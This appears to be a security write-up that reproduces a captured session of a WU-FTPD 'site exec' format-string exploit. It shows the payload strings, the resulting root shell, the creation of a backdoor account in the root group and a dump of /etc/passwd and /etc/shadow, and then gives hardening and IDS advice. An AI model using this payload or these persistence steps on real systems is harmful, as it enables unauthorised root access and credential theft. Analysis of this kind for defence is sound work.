DST: 200 (end of 'xx(...%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f%p')
SRC: site exec xx(....%d%.134699076d.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%.f%c%c%c%.f%n
SRC: /bin/uname -a;/usr/bin/id;
DST: Linux vm-redhat62 2.2.14-5.0smp #1 SMP Tue Mar 7 21:01:40 EST 2000 i686 unknown
DST: uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)
SRC: w
DST: 10:25am up 15 min, 0 users, load average: 0.04, 0.05, 0.06
SRC: export PATH=$PATH:/usr/sbin
SRC: adduser wonka -G 0
SRC: cat /etc/passwd
DST: root:x:0:0:root:/root:/bin/bash
DST: bin:x:1:1:bin:/bin:
DST: daemon:x:2:2:daemon:/sbin:
DST: adm:x:3:4:adm:/var/adm:
DST: lp:x:4:7:lp:/var/spool/lpd:
DST: sync:x:5:0:sync:/sbin:/bin/sync
DST: shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
DST: halt:x:7:0:halt:/sbin:/sbin/halt
DST: mail:x:8:12:mail:/var/spool/mail:
DST: news:x:9:13:news:/var/spool/news:
DST: uucp:x:10:14:uucp:/var/spool/uucp:
DST: operator:x:11:0:operator:/root:
DST: games:x:12:100:games:/usr/games:
DST: gopher:x:13:30:gopher:/usr/lib/gopher-data:
DST: ftp:x:14:50:FTP User:/home/ftp:
DST: nobody:x:99:99:Nobody:/:
DST: xf
DST: s:x:43:43:X Font Server:/etc/X11/fs:/bin/false
DST: named:x:25:25:Named:/var/named:/bin/false
DST: postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash
DST: jward:x:500:500:John Ward:/home/jward:/bin/bash
DST: beavis:x:501:501::/home/beavis:/bin/bash
DST: butthead:x:502:502::/home/butthead:/bin/bash
DST: wonka:x:503:503::/home/wonka:/bin/bash
SRC: passwd wonka
DST: New UNIX password:
SRC: candy
DST: BAD PASSWORD: it is too short
DST: Retype new UNIX password:
SRC: candy
DST: Changing password for user wonka
DST: passwd: all authentication tokens updated successfully
SRC: cat /etc/shadow
DST: root:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/:12939:0:99999:7:-1:-1:134540356
DST: bin:*:12939:0:99999:7:::
DST: daemon:*:12939:0:99999:7:::
DST: adm:*:12939:0:99999:7:::
DST: lp:*:12939:0:99999:7:::
DST: sync:*:12939:0:99999:7:::
DST: shutdown:*:12939:0:99999:7:::
DST: halt:*:12939:0:99999:7:::
DST: mail:*:12939:0:99999:7:::
DST: news:*:12939:0:99999:7:::
DST: uucp:*:12939:0:99999:7:::
DST: operator:*:12939:0:99999:7:::
DST: games:*:12939:0:99999:7:::
DST: gopher:*:12939:0:99999:7:::
DST: ftp:*:12939:0:99999:7:::
DST: nobody:*:12939:0:99999:7:::
DST: xfs:!!:12939:0:99999:7:::
DST: named:!!:12939
DST: :0:99999:7:::
DST: postgres:!!:12939:0:99999:7:::
DST: jward: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:12939:0:99999:7:-1:-1:134540356
DST: beavis: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:13033:0:99999:7:-1:-1:134540332
DST: butthead: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:0:99999:7:-1:-1:134540332
DST: wonka: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:13048:0:99999:7:-1:-1:134539228
SRC: exit
By looking at the above transcript, we can see where the attacked puts the overflow code into memory and exploits the vunerability in WU-FTP. Notice in the data passed to the password prompt the encoded execution of /bin/sh. Once exploited, the script checks its uid to confirm that it is root. The remaining commands simply creates accounts, confirms the account it created and logs off to minimize being exposed for a large period of time. It also reduces the amount of information in this transcript. A clever attacker would reconnect using an encrypted protocol such as SSH to prevent sniffers such as Snort from seeing what further actions the attacker will use.
In the above scenario, we can look at things that would have minimized the impact of being exploited. Ignoring the obvious such as running behind a firewall, first is to shut off unnecessary services. If the above was simple a web server, there would be no reason for the additional services such as NFS and FTP to be running. Unnecessary services can provide detailed information about a server and it arcitecture, and in server cases, have vunerabilites that can be exploited by attackers. Second would be to be aware of any vunerabilities for your environment. Scanning vunerability databases can provide an security practitioner with lots of information, such as the frequency that past vunerabilities have appeared for your architecture. Third is keeping an eye on the servers that are exposed to the Internet. Even if you are running one service, and its behind a firewall, monitoring traffic to and from is invaluable in incident response. Never assume that a box is fully secure. As Richard Bejtlich constantly says, there are always people out there smarter than you, no matter how good you are. This is why prevention will eventually fail. But don’t abondon your prevention strategy. Having an IDS in conjunction with various access controls and IPS solutions is a step towards being proactive in your incident reponse strategy.
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